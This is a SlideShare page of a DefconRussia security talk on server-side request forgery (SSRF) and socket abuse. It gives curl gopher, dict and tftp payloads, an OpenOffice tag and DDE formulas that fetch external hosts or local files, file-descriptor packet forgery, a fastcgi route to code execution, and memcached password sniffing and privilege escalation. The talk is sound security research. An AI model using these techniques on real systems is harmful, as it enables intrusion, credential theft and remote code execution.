SlideShare une entreprise Scribd logo

Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities

DefconRussia
DefconRussia
1  sur  39
Télécharger pour lire hors ligne
SSRF attacks and sockets: smorgasbord of vulnerabilities Vladimir Vorontsov, Alexander Golovko ONsec: web applications security
Authors bio • Vladimir Vorontsov - security researcher, bug hunter awarded by Google/Yandex/ Adobe • Alexander Golovko - security researcher, Debian maintainer • Working together in ONsec company on web applications security
A few words about modern web security Input validation Format processing External network access Internal network access
Forge your protocol brands! • Make a request from a server • Attack internal network • Forge packets • Splitting/smuggling • Other protocols! • Universal ways such as gopher:// • Exploit anything ;)
SSRF - new type of vulnerabilities? • We mean that SSRF is a generalized class of attacks • Introduced and used for convenience • Several vulnerabilities together or only one can lead to SSRF attacks • To vulns classification use CWE ;)
Where can i find SSRF? • Export from remote files (like as «Upload from URL», «Export RSS feed») • POP3/IMAP/SMTP connections from webapps • File format processing (XML, docx, archives, etc) • Databases • Others ...
Writing to socket in webapp code - bad way • Host/port filtering is strange on webapp level. Work for firewall and admins, right? • Protocol smuggling (CRLF and others) • What you mean when send in socket «GET / HTTP/1.1rnHost: domrnrn» ? • And what server mean when receive this?
Using HTTP clients - bad way too • When you using HTTP clients such as cURL remember their features: • ! Unsafe redirect (http:// --> file://) • Various protocols support (gopher:// dict:// tftp:// rtsp:// ) • Maximum URL length is more than browsers value (100Mb URL is OK)
Redirect tricks header("Location: ".$_GET['r']); • Bypass webapp filters i.e. preg_replace using redirect • any host -> localhost • valid port -> any port • valid schema -> any schema • SOP for browsers, not for HTTPClients
Dict schema • http://tools.ietf.org/html/rfc2229 • curl dict://localhost:8000/GET / HTTP/1.1 • Receive on server: CLIENT libcurl 7.24.0 GET / HTTP/1.1 QUIT
Gopher schema • http://www.ietf.org/rfc/rfc1436.txt • TCP packets with your content • Without r n t chars by RFC (and 00 for cURL). But all chars in LWP, Java, ASP.Net ;) • By Polyakov/Chastukhin [ERPscan] at BH_US_12 and CVE-2012-5085 (fixed now) • curl gopher://localhost:8000/2MyData # nc -vv -l -p 8000 listening on [any] 8000 ... connect to [127.0.0.1] from localhost [127.0.0.1] 64096 MyData
Gopher schema • PHP doesn’t support gopher protocol! • Do not worry! PHP supports all vulnerabilities! • --with-curlwrappers provide gopher protocol in file_get_contents and others such as XXE
TFTP schema • http://www.ietf.org/rfc/rfc1350.txt • UDP packets with your content (w/o 00 in cUrl) and 0x00 0x01 first bytes (really bad) • curl tftp://localhost:64/MyUdpPacketHere 02:11:21.378724 IP6 localhost.55928 > localhost.64: UDP, length 54 0x0000: 6000 0000 003e 1140 0000 0000 0000 0000 `....>.@........ 0x0010: 0000 0000 0000 0001 0000 0000 0000 0000 ................ 0x0020: 0000 0000 0000 0001 da78 2bcb 003e 0051 .........x+..>.Q 0x0030: 0001 4d79 5564 7050 6163 6b65 7448 6572 ..MyUdpPacketHer 0x0040: 6500 6f63 7465 7400 7473 697a 6500 3000 e.octet.tsize.0. 0x0050: 626c 6b73 697a 6500 3531 3200 7469 6d65 blksize.512.time 0x0060: 6f75 7400 3600 out.6.
TFTP schema • Currently working on splitting datagrams to bypass 0x00 0x01 header in second packet • Without stable results now unfort ;(
Various format processing issues • XML - External Entities, Signatures, WS etc (see http://erpscan.com/wp-content/uploads/ 2012/11/SSRF.2.0.poc_.pdf and http:// www.slideshare.net/d0znpp/onsec-phdays-2012- xxe-incapsulated-report) • OpenOffice products (Draw, Calc and others) • All soft which can open sockets (provide links to external files in file format) - all modern soft • others (see you at HITB 2013)
OpenOffice - pretty good stuff • Universal solution to convert office documents • Common in Enterprise system and large portals • Many forks (Libre and others) • What happens while uploaded document is converted? • What about links to external files in the documents?
OpenOffice - pretty good stuff for SSRF • RTFM http://docs.oasis-open.org/office/v1.2/ • Find all tags with xlink:href attribute • Do not forget about macros and applets (but really rare activated) • Exploit it! • <draw:image xlink:href="http://ololo.onsec.ru/? i’mSSRFed" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>
OpenOffice - pretty good stuff for SSRF • Formula for happiness • DDE is your friend • =DDE("soffice","file://i-want-to-read-this-file...) • Use simple formula to full path disclosure =CELL("filename") • Address links • A1='file:///etc/hosts'#$Sheet1.A1:B31 • B1=INDIRECT(A1)
SSRF exploitation ways • Open new socket • Use already opened sockets/files (authorized) • Where can i find opened sockets/files?
File descriptors: basics • Where does files in SSRF theme? • Data streams basics: sockets and files, etc • File descriptor - pointer to data stream • Each process have their own FD • dup, fork, exec - O_CLOEXEC • New data stream - new FD • Privileges while creating FD, not while access
File descriptors: API • FD have minimum number by default (easy brute) • Access to already opened FDs: • PHP 5.3.3 <= 5.3.14 provide special wrapper fd:// to use FD simplest (later only on CLI mode) • Java: java.io.FileDescriptor • Perl: open AA, ‘>&2’; print AA ‘DataToFD’; • Python: os.open + os.write • Ruby: fd=IO.new(99,’w’);fd.write(‘ToFD-№99’); • Shell I/O redirection: $echo 123 > &2 • Privileges for chuid programs
File descriptors: ProcFS • Special pseudo files system • Common in Linux, available in FreeBSD (not by default) • While opening /proc/<PID>/fd/<N> new datastream will be create with the same parameters (!not the same as FD API access to FD directly!) • You need together two FS privileges to access /proc • privileges on /proc/<PID>/fd/<N> • privileges on target file (!but not directories) • Examples: • RHEL /var/log/httpd/ - 0700, but access.log - 0644 • Debian before first rotate access.log - 0644, than 0640
File descriptors: cases • Already opened FDs: • May be opened with privileges greater than current • In sockets case may be already authorized • Typical case: starting Apache: • open sockets to listen (80,443) by root • open error/access.logs by root • fork childs • chuid() to www-data for all forks • You may write to error/access.logs and sockets from child processes
Stuff here: File descriptors: examples • Write a HTTP packet into opened FD to forge server output (to current client): fd6.write("HTTP 200 OKrnHost: localhostrn...");//also forge logs • Write a MySQL packet into opened FD to do SQL command: fd1.write("x22x00x00x00x03INSERT INTO aa VALUES(1,'fwrite')");
Database connections pool • Pool is array of sockets with authorized sessions • Start when application server started and never close while app server working • May be many pools with different privileges (but not different for SSRF)
PHP fastcgi SSRF RCE • Set php_admin_value, php_admin_ flag from Stuff here: frontend • Access to fastcgi over socket threw SSRF • run any file as PHP script • Set fastcgi headers in forged fastcgi packet and overwrite php_admin_value, php_value • allow_url_fopen + auto_prepend_file +data:// text/php,<?php phpinfo();?> = RCE • doesn’t work when php_admin_{value, flag} set in php fpm config
Want something really cool?
Memcached SSRF: easy and very dangerously • Host-basic auth in general • TCP and UDP sockets by default • At the same host with webapp • Plain/text protocol (binary also available) • Does not close the socket after an improper request • Needed only n (0x0a) injection to do this
Memcached SSRF: exploitation methodology • Collect all available keys • Sort keys by name, determine interesting • Find interesting data • Replace interesting data to arbitrary
Memcached SSRF: inject sniffer • Find html/js/etc template of login page in memcached values • Insert your login/password JS/etc sniffer • Watch sniffer’s logs and get passwords ;) • Profit
Memcached SSRF: dynamic templates RCE • Find template with interpreter’s code • Modify code to arbitrary • Call page with target template • Profit
Memcached SSRF: escalate your privileges • Find session in memcached keys • Determine key which contain privileges flag of your current session (such as ‘Priv’) • Modify your access level to «superadmin» • You can also create a new «special» session with TTL 100 years if you want • Profit
Format SSRF answer to read data (HTTP) • In many cases webapp logic provide reading only one output format (such as images or XML) • Use HTTP request smuggling to do this • One connection but many requests • If protocol support this, you get concatenated output • Try challenge http:// hackquest.zeronights.org/missions/ErsSma/
Format SSRF answer to read data (HTTP) $f=fsockopen("localhost",80); fputs($f,"GET /$path HTTP/1.1rnHost: localhostrnrn"); HTTP/1.1 200 OK ... GET /1 HTTP/1.1 data 1 Host: localhost HTTP/1.1 200 OK GET /2 HTTP/1.1 ... Host: localhost data 2 GET /3 HTTP/1.1 HTTP/1.1 200 OK Host: localhost ... data3
Format SSRF answer to read data (HTTP) GET /head HTTP/1.1 HTTP/1.1 200 OK Host: localhost ... <?xml version=‘1.0’?><root> GET /data HTTP/1.1 <![CDATA[ Host: localhost HTTP/1.1 200 OK GET /foot HTTP/1.1 ... Host: localhost i want to read this <secret>ololo</secret> while($s = fgets($f))         $resp.=$s; $resp=substr($resp,strpos($resp,"rnr HTTP/1.1 200 OK n")); $doc = new DOMDocument(); ... $doc->loadXML($resp); echo $doc->getElementsByTagName("root")- ]]></root> >item(0)->nodeValue;
Format SSRF answer to read data (HTTP) • How to create header and footer as you want? • Range HTTP header is your friend • All web pages are your friends • Make a mosaic of pieces - server responses
What about images? • Valid JPG with data which you want to read in EXIF • GIF header and your data at EOF • Inject data into image header which hold even after resize (http:// ax330d.blogspot.ru/2011/06/mosaic- of-attacks-from-image-upload.html) • PHP getimagesize() bypass (http:// lab.onsec.ru/2012/05/php-all- getimage-bypass.html)
What about hosting centers? • TFTP server contain machine images • Machines get TFTP images until netboot • Attacker may get images from TFTP and get /etc/shadow and other staff
What the next? • SSRF bible cheatsheet available now! • https://docs.google.com/document/d/ 1v1TkWZtrhzRLy0bYXBcdLUedXGb9njT NIJXa3u9akHM • Follow us: http://lab.onsec.ru [ENG] @d0znpp @ONsec_lab

Recommandé

SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
Ssrf
SsrfSsrf
SsrfIlan Mindel
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 

Recommandé

SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
Ssrf
SsrfSsrf
SsrfIlan Mindel
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generatorsDEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generatorsFelipe Prado
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
Api security-testing
Api security-testingApi security-testing
Api security-testingn|u - The Open Security Community
 
RxSwift コードリーディングの勘所@社内RxSwift勉強会
RxSwift コードリーディングの勘所@社内RxSwift勉強会RxSwift コードリーディングの勘所@社内RxSwift勉強会
RxSwift コードリーディングの勘所@社内RxSwift勉強会Yuki Takahashi
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightningwremes
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Ef09 installing-alfresco-components-1-by-1
Ef09 installing-alfresco-components-1-by-1Ef09 installing-alfresco-components-1-by-1
Ef09 installing-alfresco-components-1-by-1Angel Borroy López
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST APINutan Kumar Panda
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
XSS
XSSXSS
XSSHrishikesh Mishra
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Jukka Zitting
 
Oracle to MySQL DatabaseLink
Oracle to MySQL DatabaseLinkOracle to MySQL DatabaseLink
Oracle to MySQL DatabaseLinkOsama Mustafa
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scaleChandrapal Badshah
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriOWASP Delhi
 
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web Day
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web DayLeveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web Day
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web DayAWS Germany
 

Contenu connexe

Tendances

DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generatorsDEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generatorsFelipe Prado
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
RxSwift コードリーディングの勘所@社内RxSwift勉強会
RxSwift コードリーディングの勘所@社内RxSwift勉強会RxSwift コードリーディングの勘所@社内RxSwift勉強会
RxSwift コードリーディングの勘所@社内RxSwift勉強会Yuki Takahashi
 
Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightningwremes
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Ef09 installing-alfresco-components-1-by-1
Ef09 installing-alfresco-components-1-by-1Ef09 installing-alfresco-components-1-by-1
Ef09 installing-alfresco-components-1-by-1Angel Borroy López
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Jukka Zitting
 
Oracle to MySQL DatabaseLink
Oracle to MySQL DatabaseLinkOracle to MySQL DatabaseLink
Oracle to MySQL DatabaseLinkOsama Mustafa
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scaleChandrapal Badshah
 

Tendances (20)

DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generatorsDEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
RxSwift コードリーディングの勘所@社内RxSwift勉強会
RxSwift コードリーディングの勘所@社内RxSwift勉強会RxSwift コードリーディングの勘所@社内RxSwift勉強会
RxSwift コードリーディングの勘所@社内RxSwift勉強会
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightning
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
Ef09 installing-alfresco-components-1-by-1
Ef09 installing-alfresco-components-1-by-1Ef09 installing-alfresco-components-1-by-1
Ef09 installing-alfresco-components-1-by-1
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
XSS
XSSXSS
XSS
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3
 
Oracle to MySQL DatabaseLink
Oracle to MySQL DatabaseLinkOracle to MySQL DatabaseLink
Oracle to MySQL DatabaseLink
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
 

En vedette

Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriOWASP Delhi
 
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web Day
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web DayLeveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web Day
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web DayAWS Germany
 
Securing Serverless Architectures - AWS Serverless Web Day
Securing Serverless Architectures - AWS Serverless Web DaySecuring Serverless Architectures - AWS Serverless Web Day
Securing Serverless Architectures - AWS Serverless Web DayAWS Germany
 
Security Boundaries and Functions of Services for Serverless Architectures on...
Security Boundaries and Functions of Services for Serverless Architectures on...Security Boundaries and Functions of Services for Serverless Architectures on...
Security Boundaries and Functions of Services for Serverless Architectures on...AWS Germany
 
Serverless Frameworks on AWS
Serverless Frameworks on AWSServerless Frameworks on AWS
Serverless Frameworks on AWSJulien SIMON
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPERPScan
 
Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...
Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...
Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...Amazon Web Services
 
Securing Systems at Cloud Scale with DevSecOps
Securing Systems at Cloud Scale with DevSecOpsSecuring Systems at Cloud Scale with DevSecOps
Securing Systems at Cloud Scale with DevSecOpsAmazon Web Services
 
AWS re:Invent 2016: Operating Your Production API (SVR402)
AWS re:Invent 2016: Operating Your Production API (SVR402)AWS re:Invent 2016: Operating Your Production API (SVR402)
AWS re:Invent 2016: Operating Your Production API (SVR402)Amazon Web Services
 
DevSecOps in Baby Steps
DevSecOps in Baby StepsDevSecOps in Baby Steps
DevSecOps in Baby StepsPriyanka Aash
 
(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014
(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014
(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014Amazon Web Services
 
Building Serverless APIs on AWS
Building Serverless APIs on AWSBuilding Serverless APIs on AWS
Building Serverless APIs on AWSJulien SIMON
 
DevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to SecurityDevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to SecurityAlert Logic
 
DEVSECOPS: Coding DevSecOps journey
DEVSECOPS: Coding DevSecOps journeyDEVSECOPS: Coding DevSecOps journey
DEVSECOPS: Coding DevSecOps journeyJason Suttie
 
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting LeftDevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting LeftDevSecCon
 
DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017kieranjacobsen
 
AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...
AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...
AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...Amazon Web Services
 
Introduction to DevSecOps on AWS
Introduction to DevSecOps on AWSIntroduction to DevSecOps on AWS
Introduction to DevSecOps on AWSAmazon Web Services
 

En vedette (20)

Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
 
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web Day
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web DayLeveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web Day
Leveraging the Security of AWS's Own APIs for Your App - AWS Serverless Web Day
 
Securing Serverless Architectures - AWS Serverless Web Day
Securing Serverless Architectures - AWS Serverless Web DaySecuring Serverless Architectures - AWS Serverless Web Day
Securing Serverless Architectures - AWS Serverless Web Day
 
Security Boundaries and Functions of Services for Serverless Architectures on...
Security Boundaries and Functions of Services for Serverless Architectures on...Security Boundaries and Functions of Services for Serverless Architectures on...
Security Boundaries and Functions of Services for Serverless Architectures on...
 
Serverless Frameworks on AWS
Serverless Frameworks on AWSServerless Frameworks on AWS
Serverless Frameworks on AWS
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAP
 
Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...
Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...
Serverless Patterns: “No server is easier to manage than no server” - AWS Sec...
 
Securing Systems at Cloud Scale with DevSecOps
Securing Systems at Cloud Scale with DevSecOpsSecuring Systems at Cloud Scale with DevSecOps
Securing Systems at Cloud Scale with DevSecOps
 
AWS re:Invent 2016: Operating Your Production API (SVR402)
AWS re:Invent 2016: Operating Your Production API (SVR402)AWS re:Invent 2016: Operating Your Production API (SVR402)
AWS re:Invent 2016: Operating Your Production API (SVR402)
 
DevSecOps in Baby Steps
DevSecOps in Baby StepsDevSecOps in Baby Steps
DevSecOps in Baby Steps
 
(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014
(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014
(SEC405) Enterprise Cloud Security via DevSecOps | AWS re:Invent 2014
 
Building Serverless APIs on AWS
Building Serverless APIs on AWSBuilding Serverless APIs on AWS
Building Serverless APIs on AWS
 
AWS Serverless Workshop
AWS Serverless WorkshopAWS Serverless Workshop
AWS Serverless Workshop
 
DevSecOps - The big picture
DevSecOps - The big pictureDevSecOps - The big picture
DevSecOps - The big picture
 
DevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to SecurityDevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to Security
 
DEVSECOPS: Coding DevSecOps journey
DEVSECOPS: Coding DevSecOps journeyDEVSECOPS: Coding DevSecOps journey
DEVSECOPS: Coding DevSecOps journey
 
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting LeftDevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
 
DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017
 
AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...
AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...
AWS re:Invent 2016: Deep-Dive: Native, Hybrid and Web patterns with Serverles...
 
Introduction to DevSecOps on AWS
Introduction to DevSecOps on AWSIntroduction to DevSecOps on AWS
Introduction to DevSecOps on AWS
 

Similaire à Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities

Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaOSSCube
 
Ingesting hdfs intosolrusingsparktrimmed
Ingesting hdfs intosolrusingsparktrimmedIngesting hdfs intosolrusingsparktrimmed
Ingesting hdfs intosolrusingsparktrimmedwhoschek
 
PHP language presentation
PHP language presentationPHP language presentation
PHP language presentationAnnujj Agrawaal
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsGianluca Varisco
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 
